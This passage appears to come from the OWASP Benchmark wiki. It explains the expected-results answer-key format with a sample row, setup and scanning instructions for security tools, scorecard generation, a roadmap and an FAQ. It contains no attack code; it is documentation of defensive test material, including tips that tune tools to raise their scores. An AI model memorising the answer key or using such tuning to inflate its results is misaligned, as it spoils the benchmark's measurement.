 # test name		category	real vulnerability	CWE	Benchmark version: 1.1	2015-05-22&lt;br /&gt;
 BenchmarkTest00001	crypto		TRUE			327&lt;br /&gt;
&lt;br /&gt;
This simply means that the first test case is a crypto test case (use of weak cryptographic algorithms), this is a real vulnerability (as opposed to a false positive), and this issue maps to CWE 327. It also indicates this expected results file is for Benchmark version 1.1 (produced May 22, 2015). There is a row in this file for each of the tens of thousands of test cases in the Benchmark.  Each time a new version of the Benchmark is published, a new corresponding results file is generated and each test case can be completely different from one version to the next.&lt;br /&gt;
&lt;br /&gt;
The Benchmark also comes with a bunch of different utilities, commands, and prepackaged open source security analysis tools, all of which can be executed through Maven goals, including:&lt;br /&gt;
&lt;br /&gt;
* Open source vulnerability detection tools to be run against the Benchmark&lt;br /&gt;
* A scorecard generator, which computes a scorecard for each of the tools you have results files for.&lt;br /&gt;
&lt;br /&gt;
==What Can You Do With the Benchmark?==&lt;br /&gt;
* Compile all the software in the Benchmark project (e.g., mvn compile)&lt;br /&gt;
* Run a static vulnerability analysis tool (SAST) against the Benchmark test case code&lt;br /&gt;
&lt;br /&gt;
* Scan a running version of the Benchmark with a dynamic application security testing tool (DAST)&lt;br /&gt;
** Instructions on how to run it are provided below&lt;br /&gt;
&lt;br /&gt;
* Generate scorecards for each of the tools you have results files for&lt;br /&gt;
** See the Tool Support/Results page for the list of tools the Benchmark supports generating scorecards for&lt;br /&gt;
&lt;br /&gt;
==Getting Started==&lt;br /&gt;
Before downloading or using the Benchmark make sure you have the following installed and configured properly:&lt;br /&gt;
&lt;br /&gt;
 GIT: http://git-scm.com/ or https://github.com/&lt;br /&gt;
 Maven: https://maven.apache.org/  (Version: 3.2.3 or newer works. We heard that 3.0.5 throws an error.)&lt;br /&gt;
 Java: http://www.oracle.com/technetwork/java/javase/downloads/index.html (Java 7 or 8) (64-bit) - Takes ALOT of memory to compile the Benchmark.&lt;br /&gt;
&lt;br /&gt;
==Getting, Building, and Running the Benchmark==&lt;br /&gt;
&lt;br /&gt;
To download and build everything:&lt;br /&gt;
&lt;br /&gt;
 $ git clone https://github.com/OWASP/benchmark &lt;br /&gt;
 $ cd benchmark&lt;br /&gt;
 $ mvn compile   (This compiles it)&lt;br /&gt;
 $ runBenchmark.sh/.bat - This compiles and runs it.&lt;br /&gt;
&lt;br /&gt;
Then navigate to: https://localhost:8443/benchmark/ to go to its home page. It uses a self signed SSL certificate, so you'll get a security warning when you hit the home page.&lt;br /&gt;
&lt;br /&gt;
Note: We have set the Benchmark app to use up to 6 Gig of RAM, which it may need when it is fully scanned by a DAST scanner. The DAST tool probably also requires 3+ Gig of RAM. As such, we recommend having a 16 Gig machine if you are going to try to run a full DAST scan. And at least 4 or ideally 8 Gig if you are going to play around with the running Benchmark app.&lt;br /&gt;
&lt;br /&gt;
== Using a VM instead ==&lt;br /&gt;
We have several preconstructed VMs or instructions on how to build one that you can use instead:&lt;br /&gt;
&lt;br /&gt;
* Docker: A Dockerfile is checked into the project [https://github.com/OWASP/Benchmark/blob/master/VMs/Dockerfile here]. This Docker file should automatically produce a Docker VM that has the latest and greatest version of the Benchmark project files. After you have Docker installed, navigate to this directory and do the following: &lt;br /&gt;
 docker build -t benchmark:v1.2 .   --&amp;gt; This builds the Docker Benchmark VM (This will take a WHILE)&lt;br /&gt;
 docker images   --&amp;gt; You should see this new image in the list provided&lt;br /&gt;
 # The above 2 steps only have to be done once. Then, to run the Benchmark in your Docker VM, just do this:&lt;br /&gt;
 docker run -p 8443:8443 -it benchmark:v1.2 /benchmark/bench.sh  --&amp;gt; Clones Benchmark from github, builds everything, and starts a remotely accessible Benchmark web app.&lt;br /&gt;
 If successful, you should see this at the end:&lt;br /&gt;
   [INFO] [talledLocalContainer] Tomcat 8.x started on port [8443]&lt;br /&gt;
   [INFO] Press Ctrl-C to stop the container...&lt;br /&gt;
 docker-machine ls (in a different window) --&amp;gt; To get IP Docker VM is exporting (e.g., tcp://192.168.99.100:2376)&lt;br /&gt;
 In a browser, navigate to: https://192.168.99.100:8443/benchmark (using the above IP as an example)&lt;br /&gt;
* Amazon Web Services (AWS) - Here's how you set up the Benchmark on an AWS VM:&lt;br /&gt;
&lt;br /&gt;
 sudo yum install git&lt;br /&gt;
 sudo yum install maven&lt;br /&gt;
 sudo yum install mvn&lt;br /&gt;
 sudo wget http://repos.fedorapeople.org/repos/dchen/apache-maven/epel-apache-maven.repo -O /etc/yum.repos.d/epel-apache-maven.repo&lt;br /&gt;
 sudo sed -i s/\$releasever/6/g /etc/yum.repos.d/epel-apache-maven.repo&lt;br /&gt;
 sudo yum install -y apache-maven&lt;br /&gt;
 git clone https://github.com/OWASP/benchmark&lt;br /&gt;
 cd benchmark&lt;br /&gt;
 chmod 755 *.sh&lt;br /&gt;
 ./runBenchmark.sh -- to run it locally on the VM.&lt;br /&gt;
 ./runRemoteAccessibleBenchmark.sh -- to run it so it can be accessed outside the VM (on port 8443).&lt;br /&gt;
&lt;br /&gt;
==Running Free Static Analysis Tools Against the Benchmark==&lt;br /&gt;
There are scripts for running each of the free SAST vulnerability detection tools included with the Benchmark against the Benchmark test cases. On Linux, you might have to make them executable (e.g., chmod 755 *.sh) before you can run them.&lt;br /&gt;
&lt;br /&gt;
Generating Test Results for PMD:&lt;br /&gt;
&lt;br /&gt;
 $ ./scripts/runPMD.sh (Linux) or .\scripts\runPMD.bat (Windows)&lt;br /&gt;
&lt;br /&gt;
Generating Test Results for FindBugs:&lt;br /&gt;
&lt;br /&gt;
 $ ./scripts/runFindBugs.sh (Linux) or .\scripts\runFindBugs.bat (Windows)&lt;br /&gt;
&lt;br /&gt;
Generating Test Results for FindBugs with the FindSecBugs plugin:&lt;br /&gt;
&lt;br /&gt;
 $ ./scripts/runFindSecBugs.sh (Linux) or .\scripts\runFindSecBugs.bat (Windows)&lt;br /&gt;
&lt;br /&gt;
In each case, the script will generate a results file and put it in the /results directory. For example: &lt;br /&gt;
&lt;br /&gt;
 Benchmark_1.2-findbugs-v3.0.1-1026.xml&lt;br /&gt;
&lt;br /&gt;
This results file name is carefully constructed to mean the following: It's a results file against the OWASP Benchmark version 1.2, FindBugs was the analysis tool, it was version 3.0.1 of FindBugs, and it took 1026 seconds to run the analysis.&lt;br /&gt;
&lt;br /&gt;
NOTE: If you create a results file yourself, by running a commercial tool for example, you can add the version # and the compute time to the filename just like this and the Benchmark Scorecard generator will pick this information up and include it in the generated scorecard. If you don't, depending on what metadata is included in the tool results, the Scorecard generator might do this automatically anyway.&lt;br /&gt;
&lt;br /&gt;
==Generating Scorecards==&lt;br /&gt;
The scorecard generation application BenchmarkScore is included with the Benchmark. It parses the output files generated by any of the supported security tools run against the Benchmark and compares them against the expected results, and produces a set of web pages that detail the accuracy and speed of the tools involved. For the list of currently supported tools, check out the: Tools Support/Results tab. If you are using a tool that is not yet supported, simply send us a results file from that tool and we'll write a parser for that tool and add it to the supported tools list.&lt;br /&gt;
&lt;br /&gt;
The following command will compute a Benchmark scorecard for all the results files in the '''/results''' directory. The generated scorecard is put into the '''/scorecard''' directory.&lt;br /&gt;
&lt;br /&gt;
 createScorecard.sh (Linux) or createScorecard.bat (Windows)&lt;br /&gt;
&lt;br /&gt;
An example of a real scorecard for some open source tools is provided at the top of the Tool Support/Results tab so you can see what one looks like.&lt;br /&gt;
&lt;br /&gt;
We recommend including the Benchmark version number in any results file name, in order to help prevent mismatches between the expected results and the actual results files.  A tool will not score well against the wrong expected results.&lt;br /&gt;
&lt;br /&gt;
===Customizing Your Scorecard Generation===&lt;br /&gt;
&lt;br /&gt;
The createScorecard scripts are very simple. They only have one line. Here's what the 1.2 version looks like:&lt;br /&gt;
&lt;br /&gt;
 mvn validate -Pbenchmarkscore -Dexec.args=&amp;quot;expectedresults-1.2.csv results&amp;quot;&lt;br /&gt;
&lt;br /&gt;
This Maven command simply says to run the BenchmarkScore application, passing in two parameters. The 1st is the Benchmark expected results file to compare the tool results against. And the 2nd is the name of the directory that contains all the results from tools run against that version of the Benchmark. If you have tool results older than the current version of the Benchmark, like 1.1 results for example, then you would do something like this instead:&lt;br /&gt;
&lt;br /&gt;
 mvn validate -Pbenchmarkscore -Dexec.args=&amp;quot;expectedresults-1.1.csv 1.1_results&amp;quot;&lt;br /&gt;
&lt;br /&gt;
To keep things organized, we actually put the expected results file inside the same results folder for that version of the Benchmark, so our command looks like this:&lt;br /&gt;
&lt;br /&gt;
 mvn validate -Pbenchmarkscore -Dexec.args=&amp;quot;1.1_results/expectedresults-1.1.csv 1.1_results&amp;quot;&lt;br /&gt;
&lt;br /&gt;
In all cases, the generated scorecard is put in the /scorecard folder.&lt;br /&gt;
&lt;br /&gt;
'''WARNING: If you generate results for a commercial tool, be careful who you distribute it to. Each tool has its own license defining when any results it produces can be released/made public. It is likely to be against the terms of a commercial tool's license to publicly release that tool's score against the OWASP Benchmark. The OWASP Benchmark project takes no responsibility if someone else releases such results.''' It is for just this reason that the Benchmark project isn't releasing such results itself.&lt;br /&gt;
&lt;br /&gt;
= Tool Scanning Tips =&lt;br /&gt;
&lt;br /&gt;
People frequently have difficulty scanning the Benchmark with various tools due to many reasons, including size of the Benchmark app and its codebase, and complexity of the tools used. Here is some guidance for some of the tools we have used to scan the Benchmark. If you've learned any tricks on how to get better or easier results for a particular tool against the Benchmark, let us know or update this page directly.&lt;br /&gt;
&lt;br /&gt;
== Generic Tips ==&lt;br /&gt;
&lt;br /&gt;
Because of the size of the Benchmark, you may need to give your tool more memory before it starts the scan. If its a Java based tool, you may want to pass more memory to it like this:&lt;br /&gt;
&lt;br /&gt;
 -Xmx4G (This gives the Java application 4 Gig of memory)&lt;br /&gt;
&lt;br /&gt;
== SAST Tools ==&lt;br /&gt;
&lt;br /&gt;
=== Checkmarx ===&lt;br /&gt;
&lt;br /&gt;
The Checkmarx SAST Tool (CxSAST) is ready to scan the OWASP Benchmark out-of-the-box. &lt;br /&gt;
Please notice that the OWASP Benchmark “hides” some vulnerabilities in dead code areas, for example:&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;java&amp;quot;&amp;gt;&lt;br /&gt;
if (0&amp;gt;1)&lt;br /&gt;
{&lt;br /&gt;
  //vulnerable code&lt;br /&gt;
}&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
By default, CxSAST will find these vulnerabilities since Checkmarx believes that including dead code in the scan results is a SAST best practice. &lt;br /&gt;
&lt;br /&gt;
Checkmarx's experience shows that security experts expect to find these types of code vulnerabilities, and demand that their developers fix them. However, OWASP Benchmark considers the flagging of these vulnerabilities as False Positives, as a result lowering Checkmarx's overall score. &lt;br /&gt;
&lt;br /&gt;
Therefore, in order to receive an OWASP score untainted by dead code, re-configure CxSAST as follows:&lt;br /&gt;
# Open the CxAudit client for editing Java queries.&lt;br /&gt;
# Override the &amp;quot;Find_Dead_Code&amp;quot; query.&lt;br /&gt;
# Add the remarked text of the original query to the new override query.&lt;br /&gt;
# Save the queries.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== FindBugs ===&lt;br /&gt;
&lt;br /&gt;
We include this free tool in the Benchmark and its all dialed in. Simply run the script: ./script/runFindBugs.(sh or bat). If you want to run a different version of FindBugs, just change its version number in the Benchmark pom.xml file.&lt;br /&gt;
&lt;br /&gt;
=== FindBugs with FindSecBugs ===&lt;br /&gt;
&lt;br /&gt;
[http://h3xstream.github.io/find-sec-bugs/ FindSecurityBugs] is a great plugin for FindBugs that significantly increases the ability for FindBugs to find security issues. We include this free tool in the Benchmark and its all dialed in. Simply run the script: ./script/runFindSecBugs.(sh or bat). If you want to run a different version of FindSecBugs, just change the version number of the findsecbugs-plugin artifact in the Benchmark pom.xml file.&lt;br /&gt;
&lt;br /&gt;
=== HP Fortify ===&lt;br /&gt;
&lt;br /&gt;
If you are using the Audit Workbench, you can give it more memory and make sure you invoke it in 64-bit mode by doing this:&lt;br /&gt;
&lt;br /&gt;
  set AWB_VM_OPTS=&amp;quot;-Xmx2G -XX:MaxPermSize=256m&amp;quot;&lt;br /&gt;
  export AWB_VM_OPTS=&amp;quot;-Xmx2G -XX:MaxPermSize=256m&amp;quot;&lt;br /&gt;
  auditworkbench -64&lt;br /&gt;
&lt;br /&gt;
We found it was easier to use the Maven support in Fortify to scan the Benchmark and to do it in 2 phases, translate, and then scan. We did something like this:&lt;br /&gt;
&lt;br /&gt;
  Translate Phase:&lt;br /&gt;
  export JAVA_HOME=$(/usr/libexec/java_home)&lt;br /&gt;
  export PATH=$PATH:/Applications/HP_Fortify/HP_Fortify_SCA_and_Apps_4.10/bin&lt;br /&gt;
  export SCA_VM_OPTS=&amp;quot;-Xmx2G -version 1.7&amp;quot;&lt;br /&gt;
  mvn sca:clean&lt;br /&gt;
  mvn sca:translate&lt;br /&gt;
&lt;br /&gt;
  Scan Phase:&lt;br /&gt;
  export JAVA_HOME=$(/usr/libexec/java_home)&lt;br /&gt;
  export PATH=$PATH:/Applications/HP_Fortify/HP_Fortify_SCA_and_Apps_4.10/bin&lt;br /&gt;
  export SCA_VM_OPTS=&amp;quot;-Xmx10G -version 1.7&amp;quot;&lt;br /&gt;
  mvn sca:scan&lt;br /&gt;
&lt;br /&gt;
=== PMD ===&lt;br /&gt;
&lt;br /&gt;
We include this free tool in the Benchmark and its all dialed in. Simply run the script: ./script/runPMD.(sh or bat). If you want to run a different version of PMD, just change its version number in the Benchmark pom.xml file. (NOTE: PMD doesn't find any security issues. We include it because its interesting to know that it doesn't.)&lt;br /&gt;
&lt;br /&gt;
=== SonarQube ===&lt;br /&gt;
&lt;br /&gt;
We include this free tool in the Benchmark and its mostly dialed in.  But its a bit tricky because SonarQube requires two parts. There is a stand alone scanner for Java. And then there is a web application that accepts the results, and in turn can then produce the results file required by the Benchmark scorecard generator for SonarQube. Running the script runSonarQube.(sh or bat) will generate the results, but if the SonarQube Web Application isn't running where the runSonarQube script expects it to be, then the script will fail.&lt;br /&gt;
&lt;br /&gt;
If you want to run a different version of SonarQube, just change its version number in the Benchmark pom.xml file.&lt;br /&gt;
&lt;br /&gt;
=== Xanitizer ===&lt;br /&gt;
&lt;br /&gt;
The vendor has written their own guide to [http://www.rigs-it.net/opendownloads/whitepapers/HowToSetUpXanitizerForOWASPBenchmarkProject.pdf How to Set Up Xanitizer for OWASP Benchmark].&lt;br /&gt;
&lt;br /&gt;
== DAST Tools ==&lt;br /&gt;
&lt;br /&gt;
=== Burp Pro ===&lt;br /&gt;
&lt;br /&gt;
You must use Burp Pro v1.6.29 or greater to scan the Benchmark due to a previous limitation in Burp Pro related to ensuring the path attribute for cookies was honored. This issue was fixed in the v1.6.29 release.&lt;br /&gt;
&lt;br /&gt;
To scan, first spider the entire Benchmark, and then select the /Benchmark URL and actively scan that branch. You can skip all the .html pages and any other pages that Burp says have no parameters.&lt;br /&gt;
&lt;br /&gt;
NOTE: We have been unable to simply run Burp Pro against the entire Benchmark in one shot. In our experience, it eventually freezes/stops scanning. We've had to run it against each test area one at a time. If you figure out how to get Burp Pro to scan all of Benchmark in one shot, let us know how you did it!&lt;br /&gt;
&lt;br /&gt;
=== OWASP ZAP ===&lt;br /&gt;
&lt;br /&gt;
ZAP may require additional memory to be able to scan the Benchmark. To configure the amount of memory:&lt;br /&gt;
* Tools --&amp;gt; Options --&amp;gt; JVM: Recommend setting to: -Xmx2048m (or larger). (Then restart ZAP).&lt;br /&gt;
&lt;br /&gt;
To run ZAP against Benchmark:&lt;br /&gt;
# Click on Show All Tabs button (if spider tab isn't visible)&lt;br /&gt;
# Go to Spider tab (the black spider) and click on New Scan button&lt;br /&gt;
# Enter: https://localhost:8443/benchmark/  into the 'Starting Point' box and hit 'Start Scan'&lt;br /&gt;
# When Spider completes, click on 'benchmark' folder in Site Map, right click and select: 'Attack --&amp;gt; Active Scan'&lt;br /&gt;
#* It will take several hours, like 3+ to complete (it's actually likely to simply freeze before completing the scan - see NOTE: below)&lt;br /&gt;
&lt;br /&gt;
For faster active scan you can&lt;br /&gt;
* Disable the ZAP DB log.&lt;br /&gt;
**  In ZAP 2.5.0+ you can:&lt;br /&gt;
*** Disable it via Options / Database / Recover Log&lt;br /&gt;
*** Set it on the command line using &amp;quot;-config database.recoverylog=false&amp;quot;&lt;br /&gt;
** In ZAP prior to 2.5.0, you need to edit the file zapdb.script (in &amp;quot;db&amp;quot; directory) and change the line:&lt;br /&gt;
*** SET FILES LOG TRUE    to:   SET FILES LOG FALSE&lt;br /&gt;
* Disable unnecessary plugins / Technologies: When you launch the Active Scan&lt;br /&gt;
** On the Policy tab, disable all plugins except: XSS (Reflected), Path Traversal, SQLi, OS Command Injection&lt;br /&gt;
** Go the Technology Tab, disable everything and only enable: MySQL, YOUR_OS, Tomcat&lt;br /&gt;
** Note: This 2nd performance improvement step is a bit like cheating as you wouldn't do this for a normal site scan. You'd want to leave all this on in case these other plugins/technologies are helpful in finding more issues. So a fair performance comparison of ZAP to other tools would leave all this one.&lt;br /&gt;
&lt;br /&gt;
To generate the ZAP XML results file so you can generate its scorecard:&lt;br /&gt;
* Tools &amp;gt; Options &amp;gt; Alerts - And set the Max alert instances to like 500.&lt;br /&gt;
* Then: Report &amp;gt; Generate XML Report...&lt;br /&gt;
&lt;br /&gt;
NOTE: Similar to Burp, we can't simply run ZAP against the entire Benchmark in one shot. In our experience, it eventually freezes/stops scanning. We've had to run it against each test area one at a time. If you figure out how to get ZAP to scan all of Benchmark in one shot, let us know how you did it!&lt;br /&gt;
&lt;br /&gt;
Things we tried that didn't improve the score:&lt;br /&gt;
* AJAX Spider - the traditional spider appears to find all (or 99%) of the test cases so the AJAX Spider does not appear to be needed against Benchmark v1.2&lt;br /&gt;
* XSS (Persistent) - There are 3 of these plugins that run by default. There aren't any stored XSS in Benchmark, so you can disable these plugins for a faster scan.&lt;br /&gt;
* DOM XSS Plugin - This is an optional plugin that didn't seem to find any additional XSS issues. There aren't an DOM specific XSS issues in Benchmark v1.2, so not surprising.&lt;br /&gt;
&lt;br /&gt;
== IAST Tools ==&lt;br /&gt;
&lt;br /&gt;
Interactive Application Security Testing (IAST) tools work differently than scanners.  IAST tools monitor an application as it runs to identify application vulnerabilities using context from inside the running application. Typically these tools run continuously, immediately notifying users of vulnerabilities, but you can also get a full report of an entire application. To do this, we simply run the Benchmark application with an IAST agent and use a crawler to hit all the pages.&lt;br /&gt;
&lt;br /&gt;
=== Contrast ===&lt;br /&gt;
&lt;br /&gt;
To use Contrast, we simply add the agent to the Benchmark environment and run the BenchmarkCrawler. The entire process should only take a few minutes. We provided a few scripts, which simply add the -javaagent:contrast.jar flag to the Benchmark launch configuration. We have tested on MacOS, Ubuntu, and Windows.  Be sure your VM has at least 4M of memory.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Ensure your environment has Java, Maven, and git installed, then build the Benchmark project&lt;br /&gt;
   '''$ git clone https://github.com/OWASP/Benchmark.git'''&lt;br /&gt;
   '''$ cd Benchmark'''&lt;br /&gt;
   '''$ mvn compile'''&lt;br /&gt;
&lt;br /&gt;
* Download a licensed copy of the Contrast Agent (contrast.jar) from your Contrast TeamServer account and put it in the /Benchmark/tools/Contrast directory.&lt;br /&gt;
   '''$ cp ~/Downloads/contrast.jar tools/Contrast'''&lt;br /&gt;
&lt;br /&gt;
* In Terminal 1, launch the Benchmark application and wait until it starts&lt;br /&gt;
   '''$  ./runBenchmark_wContrast.sh''' (.bat on Windows)&lt;br /&gt;
   '''[INFO] Scanning for projects...&lt;br /&gt;
   '''[INFO]                                                                         &lt;br /&gt;
   '''[INFO] ------------------------------------------------------------------------&lt;br /&gt;
   '''[INFO] Building OWASP Benchmark Project 1.2&lt;br /&gt;
   '''[INFO] ------------------------------------------------------------------------&lt;br /&gt;
   '''[INFO] &lt;br /&gt;
   '''...&lt;br /&gt;
   '''[INFO] [talledLocalContainer] Tomcat 8.x started on port [8443]'''&lt;br /&gt;
   '''[INFO] Press Ctrl-C to stop the container...'''&lt;br /&gt;
&lt;br /&gt;
* In Terminal 2, launch the crawler and wait a minute or two for the crawl to complete.&lt;br /&gt;
   '''$ ./runCrawler.sh''' (.bat on Windows)&lt;br /&gt;
&lt;br /&gt;
* A Contrast report has been generated in /Benchmark/tools/Contrast/working/contrast.log.  This report will be automatically copied (and renamed with version number)  to /Benchmark/results directory.&lt;br /&gt;
   '''$ more tools/Contrast/working/contrast.log'''&lt;br /&gt;
   '''2016-04-22 12:29:29,716 [main b] INFO - Contrast Runtime Engine&lt;br /&gt;
   '''2016-04-22 12:29:29,717 [main b] INFO - Copyright (C) 2012&lt;br /&gt;
   '''2016-04-22 12:29:29,717 [main b] INFO - Pat. 8,458,789 B2&lt;br /&gt;
   '''2016-04-22 12:29:29,717 [main b] INFO - Contrast Security, Inc.&lt;br /&gt;
   '''2016-04-22 12:29:29,717 [main b] INFO - All Rights Reserved&lt;br /&gt;
   '''2016-04-22 12:29:29,717 [main b] INFO - https://www.contrastsecurity.com/&lt;br /&gt;
   '''...'''&lt;br /&gt;
&lt;br /&gt;
* Press Ctrl-C to stop the Benchmark in Terminal 1.  Note: on Windows, select &amp;quot;N&amp;quot; when asked Terminate batch job (Y/N))&lt;br /&gt;
   '''[INFO] [talledLocalContainer] Tomcat 8.x is stopped'''&lt;br /&gt;
   '''Copying Contrast report to results directory'''&lt;br /&gt;
&lt;br /&gt;
* Generate scorecards in /Benchmark/scorecard&lt;br /&gt;
   '''$ ./createScorecards.sh''' (.bat on Windows)&lt;br /&gt;
   '''Analyzing results from Benchmark_1.2-Contrast.log&lt;br /&gt;
   '''Actual results file generated: /Users/owasp/Projects/Benchmark/scorecard/Benchmark_v1.2_Scorecard_for_Contrast.csv&lt;br /&gt;
   '''Report written to: /Users/owasp/Projects/Benchmark/scorecard/Benchmark_v1.2_Scorecard_for_Contrast.html&lt;br /&gt;
&lt;br /&gt;
* Open the Benchmark Scorecard in your browser&lt;br /&gt;
   '''/Users/owasp/Projects/Benchmark/scorecard/Benchmark_v1.2_Scorecard_for_Contrast.html'''&lt;br /&gt;
&lt;br /&gt;
= RoadMap =&lt;br /&gt;
&lt;br /&gt;
Benchmark v1.0 - Released April 15, 2015 - This initial release included over 20,000 test cases in 11 different vulnerability categories. As this initial version was not a runnable application, it was only suitable for assessing static analysis tools (SAST).&lt;br /&gt;
&lt;br /&gt;
Benchmark v1.1 - Released May 23, 2015 - This update fixed some inaccurate test cases, and made sure that every vulnerability area included both True Positives and False Positives.&lt;br /&gt;
&lt;br /&gt;
Benchmark Scorecard Generator - Released July 10, 2015 - The ability to automatically and repeatably produce a scorecard of how well tools do against the Benchmark was released for most of the SAST tools supported by the Benchmark. Scorecards present graphical as well as statistical data on how well a tool does against the Benchmark down to the level of detail of how exactly it did against each individual test in the Benchmark. [https://rawgit.com/OWASP/Benchmark/master/scorecard/OWASP_Benchmark_Home.html Here are the latest public scorecards].  Support for producing scorecards for additional tools is being added all the time and the current full set is documented on the '''Tool Support/Results''' and '''Quick Start''' tabs of this wiki.&lt;br /&gt;
&lt;br /&gt;
Benchmark v1.2beta - Released Aug 15, 2015 - The 1st release of a fully runnable version of the Benchmark to support assessing all types of vulnerability detection and prevention technologies, including DAST, IAST, RASP, WAFs, etc. This involved creating a user interface for every test case, and enhancing each test case to make sure its actually exploitable, not just uses something that is theoretically weak. This release is under 3,000 test cases to make it practical to scan the entire Benchmark with a DAST tool in a reasonable amount of time, with commodity hardware specs.&lt;br /&gt;
&lt;br /&gt;
Benchmark 1.2 - Released June 5, 2016 -  Based on feedback from a number of DAST tool developers, and other vendors as well, we made the Benchmark more realistic in a number of ways to facilitate external DAST scanning, and also made the Benchmark more resilient against attack so it could properly survive various DAST vulnerability detection and exploit verification techniques.&lt;br /&gt;
&lt;br /&gt;
Plans for Benchmark 1.3:&lt;br /&gt;
&lt;br /&gt;
While we don't have hard and fast rules of exactly what we are going to do next, enhancements in the following areas are planned for the next release:&lt;br /&gt;
&lt;br /&gt;
* Add new vulnerability categories (e.g., Hibernate Injection)&lt;br /&gt;
* Add support for popular server side Java frameworks (e.g., Spring)&lt;br /&gt;
* Add web services test cases&lt;br /&gt;
&lt;br /&gt;
We are also starting to work on the ability to score WAFs/RASPs and other defensive technology against Benchmark.&lt;br /&gt;
&lt;br /&gt;
= FAQ =&lt;br /&gt;
&lt;br /&gt;
==1. How are the scores computed for the Benchmark?==&lt;br /&gt;
&lt;br /&gt;
Each test case has a single vulnerability of a specific type. Its either a real vulnerability (True Positive) or not (a False Positive). We document all the test cases for each version of the Benchmark in the expectedresults-VERSION#.csv file (e.g., expectedresults-1.1.csv). This file lists the test case name, the CWE type of the vulnerability, and whether it is a True Positive or not. The Benchmark supports scorecard generators for computing exactly how a tool did when analyzing a version of the Benchmark. The full list of supported tools is on the Tools Support/Results tab. For each tool there is a parser that can parse the native results format for that tool (usually XML). This parser simply, for each test case, looks to see if that tool reported a vulnerability of the type expected in the test case source code file (for SAST) or the test case URL (for DAST/IAST). If it did, and the test case was a True Positive, the tool gets credit for finding it. If it is a False Positive test, and the tool reports that type of finding, then its recorded as a False Positive. If the tool didn't report that type of vulnerability for a test case, then they get either a False Negative, or a True Negative as appropriate. After calculating all of the individual test case results, a scorecard is generated providing a chart and statistics for that tool across all the vulnerability categories, and pages are also created comparing different tools to each other in each vulnerability category (if multiple tools are being scored together).&lt;br /&gt;
&lt;br /&gt;
A detailed file explaining exactly how that tool did against each individual test case in that version of the Benchmark is produced as part of scorecard generation, and is available via the Actual Results link on each tool's scorecard page. (e.g., Benchmark_v1.1_Scorecard_for_FindBugs.csv).&lt;br /&gt;
&lt;br /&gt;
==2. What if the tool I'm using doesn't have a scorecard generator for it?==&lt;br /&gt;
&lt;br /&gt;
Send us the results file! We'll be happy to create a parser for that tool so its now supported.&lt;br /&gt;
&lt;br /&gt;
==3. What if a tool finds other unexpected vulnerabilities?==&lt;br /&gt;
&lt;br /&gt;
We are sure there are vulnerabilities we didn't intend to be there and we are eliminating them as we find them. If you find some, let us know and we'll fix them too. We are primarily focused on unintentional vulnerabilities in the categories of vulnerabilities the Benchmark currently supports, since that is what is actually measured.&lt;br /&gt;
&lt;br /&gt;
Right now, two types of vulnerabilities that get reported are ignored by the scorecard generator:&lt;br /&gt;
# Vulnerabilities in categories not yet supported&lt;br /&gt;
# Vulnerabilities of a type that is supported, but reported in test cases not of that type&lt;br /&gt;
&lt;br /&gt;
In the case of #2, false positives reported in unexpected areas are also ignored, which is primarily a DAST problem. Right now those false positives are completely ignored, but we are thinking about including them in the false positive score in some fashion. We just haven't decided how yet.&lt;br /&gt;
&lt;br /&gt;
==4. How should I configure my tool to scan the Benchmark?==&lt;br /&gt;
&lt;br /&gt;
All tools support various levels of configuration in order to improve their results. The Benchmark project, in general, is trying to '''compare out of the box capabilities of tools'''. However, if a few simple tweaks to a tool can be done to improve that tool's score, that's fine. We'd like to understand what those simple tweaks are, and document them here, so others can repeat those tests in exactly the same way. For example, just turn on the 'test cookies and headers' flag, which is off by default. Or turn on the 'advanced' scan, so it will work harder, find more vulnerabilities. Its simple things like this we are talking about, not an extensive effort to teach the tool about the app, or perform 'expert' configuration of the tool.&lt;br /&gt;
&lt;br /&gt;
So, if you know of some simple tweaks to improve a tool's results, let us know what they are and we'll document them here so everyone can benefit and make it easier to do apples to apples comparisons. And we'll link to that guidance once we start documenting it, but we don't have any such guidance right now.&lt;br /&gt;
&lt;br /&gt;
==5. I'm having difficulty scanning the Benchmark with a DAST tool. How can I get it to work?==&lt;br /&gt;
&lt;br /&gt;
We've run into 2 primary issues giving DAST tools problems.&lt;br /&gt;
&lt;br /&gt;
a) The Benchmark Generates Lots of Cookies&lt;br /&gt;
&lt;br /&gt;
The Burp team pointed out a cookies bug in the 1.2beta Benchmark. Each Weak Randomness test case generates its own cookie, 1 per test case. This caused the creation of so many cookies that servers would eventually start returning 400 errors because there were simply too many cookies being submitted in a request. This was fixed in the Aug 27, 2015 update to the Benchmark by setting the path attribute for each of these cookies to be the path to that individual test case. Now, only at most one of these cookies should be submitted with each request, eliminating this 'too many cookies' problem. However, if a DAST tool doesn't honor this path attribute, it may continue to send too many cookies, making the Benchmark unscannable for that tool. Burp Pro prior to 1.6.29 had this issue, but it was fixed in the 1.6.29 release.&lt;br /&gt;
&lt;br /&gt;
b) The Benchmark is a BIG Application&lt;br /&gt;
&lt;br /&gt;
Yes. It is, so you might have to give your scanner more memory than it normally uses by default in order to successfully scan the entire Benchmark. Please consult your tool vendor's documentation on how to give it more memory.&lt;br /&gt;
&lt;br /&gt;
Your machine itself might not have enough memory in the first place. For example, we were not able to successfully scan the 1.2beta with OWASP ZAP with only 8 Gig of RAM. So, you might need a more powerful machine or use a cloud provided machine to successfully scan the Benchmark with certain DAST tools. You may have similar problems with SAST tools against large versions of the Benchmark, like the 1.1 release.&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
&lt;br /&gt;
The following people, organizations, and many others, have contributed to this project and their contributions are much appreciated!&lt;br /&gt;
&lt;br /&gt;
* Lots of Vendors - Many vendors have provided us with either trial licenses we can use, or they have run their tools themselves and either sent us results files, or written and contributed scorecard generators for their tool. Many have also provided valuable feedback so we can make the Benchmark more accurate and more realistic.&lt;br /&gt;
* Juan Gama - Development of initial release and continued support&lt;br /&gt;
* Ken Prole - Assistance with automated scorecard development using CodeDx&lt;br /&gt;
* Nick Sanidas - Development of initial release&lt;br /&gt;
* Denim Group - Contribution of scan results to facilitate scorecard development&lt;br /&gt;
* Tasos Laskos - Significant feedback on the DAST version of the Benchmark&lt;br /&gt;
* Ann Campbell - From SonarSource - for fixing our SonarQube results parser&lt;br /&gt;
* Dhiraj Mishra - OWASP Member - contributed SQLi/XSS fuzz vectors as initial contribution towards adding support for WAF/RASP scoring&lt;br /&gt;
&lt;br /&gt;
